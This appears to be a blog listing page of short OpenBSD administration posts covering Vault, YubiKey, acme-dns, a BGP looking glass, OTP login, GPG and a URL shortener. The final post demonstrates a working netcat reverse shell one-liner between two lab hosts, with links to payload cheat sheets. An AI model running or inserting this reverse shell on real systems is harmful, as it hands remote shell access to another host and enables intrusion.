OpenBSD

Vault on OpenBSD

How to install and run HashiCorp Vault on OpenBSD. In addition to [this Blog Entry](https://blog.stoege.net/categories/vault/), here are some instructions for OpenBSD.

Requirements: a VM with OpenBSD 7.2 (or older …) and root/doas permission; a domain, or at least a FQDN name pointing to your VM; HTTP/HTTPS allowed from the Internet (for certificate generation); Nginx installed (pkg_add nginx).

Source: https://developer.hashicorp.com/vault/docs/get-started/developer-qs

Install Vault (all steps must be run as root, or with doas): pkg_add vault

Vault Config: Backup the prev.

Yubikey - on OpenBSD

Running YubiKey on OpenBSD: buy a key and give it a try … Source: https://www.yubico.com/

Install the software with pkg_add yubikey-manager-3.1.2p4:

```
pkg_add yubikey-manager-3.1.2p4
quirks-6.42 signed on 2023-01-08T01:39:04Z
yubikey-manager-3.1.2p4:py3-click-7.1.2: ok
yubikey-manager-3.1.2p4:py3-pyusb-1.0.2p5: ok
yubikey-manager-3.1.2p4:pcsc-lite-1.9.8: ok
yubikey-manager-3.1.2p4:py3-cparser-2.19p2: ok
yubikey-manager-3.1.2p4:py3-cffi-1.15.1: ok
yubikey-manager-3.1.2p4:py3-cryptography-38.0.0p0: ok
yubikey-manager-3.1.2p4:py3-pyscard-2.0.3: ok
yubikey-manager-3.1.2p4:py3-openssl-22.0.0: ok
yubikey-manager-3.1.2p4:libyubikey-1.13p4: ok
yubikey-manager-3.1.2p4:json-c-0.16: ok
yubikey-manager-3.1.2p4:ykpers-1.20.0p2: ok
yubikey-manager-3.1.2p4: ok
The following new rcscripts were installed: /etc/rc.d/pcscd
See rcctl(8) for details.
--- +yubikey-manager-3.1.2p4 -------------------
NOTE: yubikey-manager (ykman) is only partially functional on OpenBSD.
Most of the "ykman fido xxx" commands (pin-setting and others) stall.
```

Acme-DNS

A simplified DNS server with a RESTful HTTP API to provide a simple way to automate ACME DNS challenges. Sounds promising, right? Let's give it a try ;) https://github.com/joohoi/acme-dns

Setup: fire up a new OpenBSD VM, let's do it in London. ip: 100.10.20.30

Patch, update, add go:

```
doas su -
syspatch
pkg_add -Vu
pkg_add go
```

Clone the repo and build acme-dns:

```
cd /root
git clone https://github.com/joohoi/acme-dns
cd acme-dns
export GOPATH=/tmp/acme-dns
go build
cp acme-dns /usr/local/sbin/
```

Create a self-signed cert: the RESTful API needs a cert.

OpenBGPD - Upgrade Looking Glass

I'm running a BGP Looking Glass server on https://bgp.stoege.net, where you can get some view of BGP running on the global Internet.

Upgrade to 7.2: Did an upgrade to the latest version with my script. The upgrade was successful, but the BGP service needs some fix. The website shows "500 Internal Server Error", and the logs got a few messages like this:

```
tail -f /var/log/messages
Oct 21 11:38:07 bapi slowcgi[62677]: execve /cgi-bin/bgplg: Permission denied
Oct 21 11:38:07 bapi slowcgi[93993]: caught exit of unknown child 62677
Oct 21 11:38:12 bapi slowcgi[45500]: execve /cgi-bin/bgplg: Permission denied
```

Reapply the permissions:

```
chmod 0550 /var/www/cgi-bin/bgplg
chown www:daemon /var/www/cgi-bin/bgplg
chmod 0555 /var/www/bin/bgpctl
chmod 4555 /var/www/bin/ping* /var/www/bin/traceroute*
```

Check the service: $ curl --head "https://bgp.

OpenBSD 7.2

OpenBSD 7.2 finally released. Yesterday, the 53rd release of OpenBSD got published, [Version 7.2](https://www.openbsd.org/72.html). I'll upgrade my boxes as usual with the following script. The most obvious change is the performance improvement for the package manager, but there is always more to see on undeadly. Upgrade Guide: as usual, follow the official Upgrade Guide. You can upgrade with a USB stick, ISO image, PXE boot or inline (from a running system).

Headscale - OpenBSD

Running Headscale Server on OpenBSD. I like and widely use WireGuard for my infrastructure. I'm also aware of its limitations and I know the Tailscale project but never gave it a try. Recently, I stumbled upon the headscale project, an open-source alternative to the (closed) Tailscale server. Perfect, let's give it a try! And, of course, I'm going to implement this with OpenBSD, what else ;)

Docs: https://github.com/juanfont/headscale/blob/main/docs/running-headscale-openbsd.md https://zakaria.org/posts/headscale-setup.md

On the server: compile and install the server; this is working on OpenBSD 7.

OpenBSD & OTP

I don't like SSH & password authentication. But sometimes, especially during setup or recovery, it's needed and makes sense. Thought I'll protect some boxes with OTP. Here are a few notes and instructions.

Build login_otp:

```
git clone https://github.com/reyk/login_otp
cd login_otp
make obj
make all
doas make install
```

Initialize the OTP DB: doas otp -i

Generate a key for the user:

```
otp -g
Name: stoege
Key: xxxx xxxx xxxx xxxx xxxx xxxx xx
URL: otpauth://totp/stoege?secret=xxxxxxxxxxxxxxxxxxxxxxxxxx&issuer=&algorithm=SHA1&digits=6&period=30
```

Build the QR code: echo "otpauth://totp/stoege?

Url Shortener for CLI

CLI URL Shortener: wrote a little URL shortener in Python with FastAPI and a wrapper script for CLI usage. Needs the httpie & jq packages. The Python backend is under development; the CLI wrappers for different OSes are right here …

Usage:

```
somehost$ ./myurlshort
usage: /usr/local/bin/myurlshort http://veeeeeeeeeeeeeeeeeeeeeeeeeery.long.url.to
anyhost$ ./myurlshort http://my-url-to-short.egal.world.planet.universe
https://url.stoege.net/xXxXx
```

CLI Wrappers, OpenBSD:

```
cat << 'EOF' > myurlshort
#!/usr/bin/env bash
# url shortener for openbsd, v1.0, 2022-09-12, by @stoege
which jq >/dev/null || ( echo -e "*** jq not installed ***\ndoas pkg_add jq\n"; )
which https >/dev/null || ( echo -e "*** httpie not installed ***\ndoas pkg_add httpie\n"; )
if [[ $# -ne 1 ]]; then
  echo -e "\nusage: $0 http://veeeeeeeeeeeeeeeeeeeeeeeeeery.
```

GPG & Gopass & Gitlab

GPG and how to use it. Create a key with ECC:

```
gpg --expert --full-generate-key
(9) ECC and ECC
(1) Curve 25519
0 = key does not expire (or whatever you prefer!)
Real name: Max Muster
Email address: max@muster.net
Comment: -
pub   ed25519 2022-09-04 [SC]
      256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E
uid   Max Muster (-) <max@muster.net>
sub   cv25519 2022-09-04 [E]
```

Public key:

```
max@host $ gpg
/home/max/.gnupg/pubring.kbx
----------------------------
pub   ed25519 2022-09-04 [SC]
      256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E
uid   [ultimate] Max Muster (-) <max@muster.
```

OpenBSD - ReverseShell

Reverse Shells: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md https://kb.systemoverlord.com/security/postex/reverse/

Test it. Listen on host A: set a listener on host A (192.168.1.100):

```
hostA # nc -l 4242
```

Start the reverse shell on host B:

```
hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 192.168.1.100 4242 >/tmp/f
```

Here we are:

```
hostA # hostname
hostA.somewhere
hostA # nc -l 4242
hostB # hostname
hostB.somewhere
```

Nice ;) Any comments?

sha256: 0a5d01e633e102b0f3e258db89028946a247ef2296eab8dbf8819bc7472779c3